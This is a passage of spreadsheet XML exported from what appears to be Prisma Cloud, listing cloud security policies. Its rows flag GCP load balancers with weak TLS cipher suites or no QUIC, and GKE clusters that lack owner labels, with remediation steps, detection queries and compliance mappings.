      <c r="E2863" t="inlineStr"/>
      <c r="F2863" t="inlineStr"/>
      <c r="G2863" t="b">
        <v>1</v>
      </c>
      <c r="H28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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2863" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2863" t="inlineStr">
        <is>
          <t>GCP Load Balancer HTTPS proxy permits SSL policies with weak cipher suites</t>
        </is>
      </c>
      <c r="L2863" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2863" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2863" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2863" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2863" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2863" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2863" t="inlineStr">
        <is>
          <t>NS-8</t>
        </is>
      </c>
      <c r="S2863" t="inlineStr"/>
      <c r="T2863" t="b">
        <v>0</v>
      </c>
      <c r="U2863" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2863" t="inlineStr">
        <is>
          <t>gcloud-compute-target-https-proxies</t>
        </is>
      </c>
      <c r="W2863" t="inlineStr">
        <is>
          <t>This policy identifies GCP HTTPS Load Balancers that permit SSL policies with weak cipher suites. GCP default SSL policy uses a minimum TLS version of 1.0 and a Compatible profile, which allows the widest range of insecure cipher suites. 
To prevent usage of insecure features, SSL policies should use at least TLS 1.2 with the MODERN profile; or  the RESTRICTED profile, because it effectively requires clients to use TLS 1.2 regardless of the chosen minimum TLS version; or a CUSTOM profile that does not support any of the following features:
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA</t>
        </is>
      </c>
      <c r="X2863" t="inlineStr">
        <is>
          <t>The 'GCP default' SSL policy uses a minimum TLS version of 1.0 and a Compatible profile, which allows the broadest range of insecure cipher suites and is not modifiable. If this SSL policy is attached to the target HTTPS Proxy Load Balancer, updating the proxy with a more secured SSL policy is recommended.
To create a new SSL policy, refer to the following URL:
https://cloud.google.com/load-balancing/docs/use-ssl-policies#creating_ssl_policies
To modify the existing insecure SSL policy attached to the Target HTTPS Proxy:
1. Login to GCP Portal
2. Go to Network services (Left Panel)
3. Select Load balancing
4. Click on 'load balancing components view' hyperlink at bottom of page to view target proxies
5. Go to 'TARGET PROXIES' tab and Click on the reported HTTPS target proxy
6. Note the 'Load balancer' name.
7. Click on the hyperlink under 'In use by'
8. Note the 'External IP address'
9. Select Load Balancing (Left Panel) and click on the HTTPS load balancer with same name as previously noted 'Load balancer' name.
10. In frontend section, consider the rule where 'IP:Port' matches the previously noted 'External IP address'.
11. Click on the 'SSL Policy' of the rule. This will take you to the alert causing SSL policy.
12. Click on 'EDIT'
13. Set 'Minimum TLS Version' to TLS 1.2 and set 'Profile' to Modern or Restricted.
14. Alternatively, if you use the profile 'Custom', make sure that the following features are disabled:
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
15. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2863" t="inlineStr"/>
      <c r="Z2863" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-target-https-proxies' as X; config from cloud.resource where api.name = 'gcloud-compute-ssl-policies' as Y; filter " $.X.sslPolicy does not exist or ($.Y.profile equals COMPATIBLE and $.Y.selfLink contains $.X.sslPolicy) or ( ($.Y.profile equals MODERN or $.Y.profile equals CUSTOM) and $.Y.minTlsVersion does not equal TLS_1_2 and $.Y.selfLink contains $.X.sslPolicy ) or ( $.Y.profile equals CUSTOM and ( $.Y.enabledFeatures[*] contains TLS_RSA_WITH_AES_128_GCM_SHA256 or $.Y.enabledFeatures[*] contains TLS_RSA_WITH_AES_256_GCM_SHA384 or $.Y.enabledFeatures[*] contains TLS_RSA_WITH_AES_128_CBC_SHA or $.Y.enabledFeatures[*] contains TLS_RSA_WITH_AES_256_CBC_SHA or $.Y.enabledFeatures[*] contains TLS_RSA_WITH_3DES_EDE_CBC_SHA ) and $.Y.selfLink contains $.X.sslPolicy ) "; show X;</t>
        </is>
      </c>
      <c r="AA2863" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2863" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2863" t="inlineStr">
        <is>
          <t>PC-GCP-LB-895</t>
        </is>
      </c>
      <c r="AD2863" t="b">
        <v>1</v>
      </c>
      <c r="AE2863" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2863" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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3" t="inlineStr">
        <is>
          <t>d97de551-06ce-4248-ac1b-3f0a4d9b35a8</t>
        </is>
      </c>
      <c r="AI2863" t="inlineStr">
        <is>
          <t>079a511f-f3ee-4f27-b0f4-a8be55c3f2e7</t>
        </is>
      </c>
      <c r="AJ2863" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2863" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2864">
      <c r="A2864" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-172, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ISO/IEC 27002:2013, PCI DSS v4.0, NIST SP 800-171 Revision 2, CIS Controls v7.1, CRI Profile v1.2.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, ISO 27002:2022, PCI DSS v4.0, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, NIST 800-53 Rev4, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CRI Profile v1.2.1, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, CIS Controls v8, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02</t>
        </is>
      </c>
      <c r="B2864" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2864" s="2" t="inlineStr"/>
      <c r="D2864" t="inlineStr"/>
      <c r="E2864" t="inlineStr"/>
      <c r="F2864" t="inlineStr"/>
      <c r="G2864" t="b">
        <v>0</v>
      </c>
      <c r="H28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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2864" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2864" t="inlineStr">
        <is>
          <t>GCP Load balancer HTTPS target proxy is not configured with QUIC protocol</t>
        </is>
      </c>
      <c r="L2864" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2864" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2864" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2864" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2864" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2864" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2864" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2864" t="inlineStr"/>
      <c r="T2864" t="b">
        <v>0</v>
      </c>
      <c r="U2864" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2864" t="inlineStr">
        <is>
          <t>gcloud-compute-target-https-proxies</t>
        </is>
      </c>
      <c r="W2864" t="inlineStr">
        <is>
          <t>This policy identifies Load Balancer HTTPS target proxies which are not configured with QUIC protocol. Enabling QUIC protocol in load balancer target https proxies adds advantage by establishing connections faster, stream-based multiplexing, improved loss recovery, and eliminates head-of-line blocking.</t>
        </is>
      </c>
      <c r="X2864" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Network services (Left Panel)
3. Select Load balancing
4. Click on 'advanced menu' hyperlink to view target proxies
5. Click on 'Target proxies' tab
6. Click on the reported HTTPS target proxy
7. Click on the hyperlink under 'URL map'
8. Click on the 'EDIT' button
9. Select 'Frontend configuration', Click on HTTPS protocol rule
10. Select 'Enabled' from the dropdown for 'QUIC negotiation'
11. Click on 'Done'
12. Click on 'Update'</t>
        </is>
      </c>
      <c r="Y2864" t="inlineStr"/>
      <c r="Z2864" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-target-https-proxies' AND json.rule = 'quicOverride does not contain ENABLE'</t>
        </is>
      </c>
      <c r="AA2864" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2864" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2864" t="inlineStr">
        <is>
          <t>PC-GCP-LB-385</t>
        </is>
      </c>
      <c r="AD2864" t="b">
        <v>1</v>
      </c>
      <c r="AE2864" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2864" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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4" t="inlineStr">
        <is>
          <t>85428780-d7fa-450c-b24c-2e62480b8778</t>
        </is>
      </c>
      <c r="AI2864" t="inlineStr">
        <is>
          <t>4000d221-6a9a-4a5b-b5bc-b9d2b3c4f0ee</t>
        </is>
      </c>
      <c r="AJ2864" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2864" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2865">
      <c r="A2865" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27001:2022, Risk Management in Technology (RMiT), Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, CIS Controls v8.1, SOC 2, HITRUST CSF v.11.2.0, CIS v2.0.0 (GCP) Level 1, ISO/IEC 27001:2022, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, DORA, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, CIS v3.0.0 (GCP) Level 1, Sarbanes Oxley Act (SOX), ITSG-33, SOC 2, GDPR, SOC 2, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8.1, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2865" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2865" s="2" t="inlineStr"/>
      <c r="D2865" t="inlineStr"/>
      <c r="E2865" t="inlineStr"/>
      <c r="F2865" t="inlineStr"/>
      <c r="G2865" t="b">
        <v>1</v>
      </c>
      <c r="H28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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2865" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2865" t="inlineStr">
        <is>
          <t>GCP Load Balancer SSL proxy permits SSL policies with weak cipher suites</t>
        </is>
      </c>
      <c r="L2865" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2865" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2865" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2865" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2865" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2865" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2865" t="inlineStr">
        <is>
          <t>NS-8</t>
        </is>
      </c>
      <c r="S2865" t="inlineStr"/>
      <c r="T2865" t="b">
        <v>0</v>
      </c>
      <c r="U2865" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2865" t="inlineStr">
        <is>
          <t>gcloud-compute-target-ssl-proxy</t>
        </is>
      </c>
      <c r="W2865" t="inlineStr">
        <is>
          <t>This policy identifies GCP SSL Load Balancers that permit SSL policies with weak cipher suites. GCP default SSL policy uses a minimum TLS version of 1.0 and a Compatible profile, which allows the widest range of insecure cipher suites.
To prevent usage of insecure features, SSL policies should use at least TLS 1.2 with the MODERN profile; or the RESTRICTED profile, because it effectively requires clients to use TLS 1.2 regardless of the chosen minimum TLS version; or a CUSTOM profile that does not support any of the following features:
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA</t>
        </is>
      </c>
      <c r="X2865" t="inlineStr">
        <is>
          <t>If the target SSL Proxy Load Balancer does not have any SSL policy configured, updating the proxy with either a new or an existing secured SSL policy is recommended.
The 'GCP default' SSL policy uses a minimum TLS version of 1.0 and a Compatible profile, which allows the broadest range of insecure cipher suites and is not modifiable. If this SSL policy is attached to the target SSL Proxy Load Balancer, updating the proxy with a more secured SSL policy is recommended.
To create a new SSL policy, refer to the following URL:
https://cloud.google.com/load-balancing/docs/use-ssl-policies#creating_ssl_policies
To modify the existing insecure SSL policy attached to the Target SSL Proxy:
1. Login to GCP Portal
2. Go to Network services (Left Panel)
3. Select Load balancing
4. Click on 'load balancing components view' hyperlink at bottom of page to view target proxies
5. Go to 'TARGET PROXIES' tab and Click on the reported SSL target proxy
6. Note the 'Backend service' name.
7. Click on the hyperlink under 'In use by'
8. Note the 'External IP address'
9. Select Load Balancing (Left Panel) and click on the SSL load balancer with same name as previously noted 'Backend service' name.
10. In frontend section, consider the rule where 'IP:Port' matches the previously noted 'External IP address'.
11. Click on the 'SSL Policy' of the rule. This will take you to the alert causing SSL policy.
12. Click on 'EDIT'
13. Set 'Minimum TLS Version' to TLS 1.2 and set 'Profile' to Modern or Restricted.
14. Alternatively, if you use the profile 'Custom', make sure that the following features are disabled:
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
15. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2865" t="inlineStr"/>
      <c r="Z2865" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-target-ssl-proxy' as X; config from cloud.resource where api.name = 'gcloud-compute-ssl-policies' as Y; filter "$.X.sslPolicy does not exist or ($.Y.profile equals COMPATIBLE and $.Y.selfLink contains $.X.sslPolicy) or ( ($.Y.profile equals MODERN or $.Y.profile equals CUSTOM) and $.Y.minTlsVersion does not equal TLS_1_2 and $.Y.selfLink contains $.X.sslPolicy ) or ( $.Y.profile equals CUSTOM and ( $.Y.enabledFeatures[*] contains TLS_RSA_WITH_AES_128_GCM_SHA256 or $.Y.enabledFeatures[*] contains TLS_RSA_WITH_AES_256_GCM_SHA384 or $.Y.enabledFeatures[*] contains TLS_RSA_WITH_AES_128_CBC_SHA or $.Y.enabledFeatures[*] contains TLS_RSA_WITH_AES_256_CBC_SHA or $.Y.enabledFeatures[*] contains TLS_RSA_WITH_3DES_EDE_CBC_SHA ) and $.Y.selfLink contains $.X.sslPolicy ) "; show X;</t>
        </is>
      </c>
      <c r="AA2865" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2865" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2865" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-894</t>
        </is>
      </c>
      <c r="AD2865" t="b">
        <v>1</v>
      </c>
      <c r="AE2865" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2865" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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5" t="inlineStr">
        <is>
          <t>a95645ec-4206-450a-9d72-b7f1cbdd5bcd</t>
        </is>
      </c>
      <c r="AI2865" t="inlineStr">
        <is>
          <t>ac4a09ec-ee87-491f-a5d6-96dc03719a2b</t>
        </is>
      </c>
      <c r="AJ2865" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2865" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2866">
      <c r="A2866" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2866" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2866" s="2" t="inlineStr"/>
      <c r="D2866" t="inlineStr"/>
      <c r="E2866" t="inlineStr"/>
      <c r="F2866" t="inlineStr"/>
      <c r="G2866" t="b">
        <v>1</v>
      </c>
      <c r="H28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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2866" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2866" t="inlineStr">
        <is>
          <t>GCP GKE - 7 Days -  No Owner</t>
        </is>
      </c>
      <c r="L2866" t="inlineStr"/>
      <c r="M2866" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2866" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2866" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2866" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2866" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2866" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S2866" t="inlineStr"/>
      <c r="T2866" t="b">
        <v>0</v>
      </c>
      <c r="U2866" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2866" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2866" t="inlineStr"/>
      <c r="X2866" t="inlineStr"/>
      <c r="Y2866" t="inlineStr"/>
      <c r="Z2866" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-container-describe-clusters' and cloud.type = 'gcp' and json.rule = "_DateTime.ageInDays(createTime) &gt; 7 and resourceLabels.owner does not exist" addcolumn resourceLabels.owner</t>
        </is>
      </c>
      <c r="AA2866" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2866" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2866" t="inlineStr"/>
      <c r="AD2866" t="b">
        <v>0</v>
      </c>
      <c r="AE2866" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2866" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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6" t="inlineStr">
        <is>
          <t>4d3c7b9c-d52e-43b2-8b62-49e7ce66ab3a</t>
        </is>
      </c>
      <c r="AI2866" t="inlineStr">
        <is>
          <t>fe4f64c8-8a75-423b-80ea-b65fb166c9f8</t>
        </is>
      </c>
      <c r="AJ2866" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2866" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2867">
      <c r="A2867" t="inlineStr">
        <is>
          <t>ISO 27002:2022</t>
        </is>
      </c>
      <c r="B2867" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2867" s="2" t="inlineStr"/>
      <c r="D2867" t="inlineStr"/>
      <c r="E2867" t="inlineStr"/>
      <c r="F2867" t="inlineStr"/>
      <c r="G2867" t="b">
        <v>0</v>
      </c>
      <c r="H28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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2867" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2867" t="inlineStr">
        <is>
          <t>ADAMS TEST UPDATED</t>
        </is>
      </c>
      <c r="L2867" t="inlineStr"/>
      <c r="M2867" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2867" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2867" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2867" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2867" t="inlineStr">
        <is>
          <t>Technological controls</t>
        </is>
      </c>
      <c r="R2867" t="inlineStr">
        <is>
          <t>8.34</t>
        </is>
      </c>
      <c r="S2867" t="inlineStr">
        <is>
          <t>Autoreplaced</t>
        </is>
      </c>
      <c r="T2867" t="b">
        <v>0</v>
      </c>
      <c r="U2867" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2867" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2867" t="inlineStr">
        <is>
          <t>NEW DESC</t>
        </is>
      </c>
      <c r="X2867" t="inlineStr"/>
      <c r="Y2867" t="inlineStr"/>
      <c r="Z2867" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-container-describe-clusters' and json.rule = "_DateTime.ageInDays(createTime) &gt; 45 and resourceLabels.owner exists" addcolumn resourceLabels.owner</t>
        </is>
      </c>
      <c r="AA2867" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2867" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2867" t="inlineStr"/>
      <c r="AD2867" t="b">
        <v>0</v>
      </c>
      <c r="AE2867" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2867" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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7" t="inlineStr">
        <is>
          <t>9c749173-f92a-4afd-852e-85b478898f9d</t>
        </is>
      </c>
      <c r="AI2867" t="inlineStr">
        <is>
          <t>aba5a5c2-bd66-48f1-be09-c8739836923b</t>
        </is>
      </c>
      <c r="AJ2867" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2867" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2868">
      <c r="A2868" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2868" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2868" s="2" t="inlineStr"/>
      <c r="D2868" t="n">
        <v>0</v>
      </c>
      <c r="E2868" t="n">
        <v>53</v>
      </c>
      <c r="F2868" t="n">
        <v>0</v>
      </c>
      <c r="G2868" t="b">
        <v>1</v>
      </c>
      <c r="H28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68" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2868" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2868" t="inlineStr">
        <is>
          <t>GCP GKE - 45 Days -  Owned</t>
        </is>
      </c>
      <c r="L2868" t="inlineStr"/>
      <c r="M2868" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2868" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2868" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2868" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2868" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2868" t="inlineStr">
        <is>
          <t>5.1.2 Config - Stale Compute Resources</t>
        </is>
      </c>
      <c r="S2868" t="inlineStr"/>
      <c r="T2868" t="b">
        <v>0</v>
      </c>
      <c r="U2868" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2868" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2868" t="inlineStr"/>
      <c r="X2868" t="inlineStr"/>
      <c r="Y2868" t="inlineStr"/>
      <c r="Z2868" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-container-describe-clusters' and json.rule = "_DateTime.ageInDays(createTime) &gt; 45 and resourceLabels.owner exists" addcolumn resourceLabels.owner</t>
        </is>
      </c>
      <c r="AA2868" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2868" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2868" t="inlineStr"/>
      <c r="AD2868" t="b">
        <v>0</v>
      </c>
      <c r="AE2868" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2868" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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68" t="inlineStr">
        <is>
          <t>f2d02017-8318-4dd6-8e8a-022555a10a7c</t>
        </is>
      </c>
      <c r="AI2868" t="inlineStr">
        <is>
          <t>aba5a5c2-bd66-48f1-be09-c8739836923b</t>
        </is>
      </c>
      <c r="AJ2868" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2868" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2869">
      <c r="A2869" t="inlineStr">
        <is>
          <t>Adam's SNOW</t>
        </is>
      </c>
      <c r="B2869" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2869" s="2" t="inlineStr"/>
      <c r="D2869" t="n">
        <v>18</v>
      </c>
      <c r="E2869" t="n">
        <v>60</v>
      </c>
      <c r="F2869" t="n">
        <v>0</v>
      </c>
      <c r="G2869" t="b">
        <v>1</v>
      </c>
      <c r="H28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69" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2869" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2869" t="inlineStr">
        <is>
          <t>ADAM CONFIG POLICY MIGRATE CUSTOMER TEST 1</t>
        </is>
      </c>
      <c r="L2869" t="inlineStr"/>
      <c r="M2869" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2869" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2869" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2869" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2869" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R2869" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
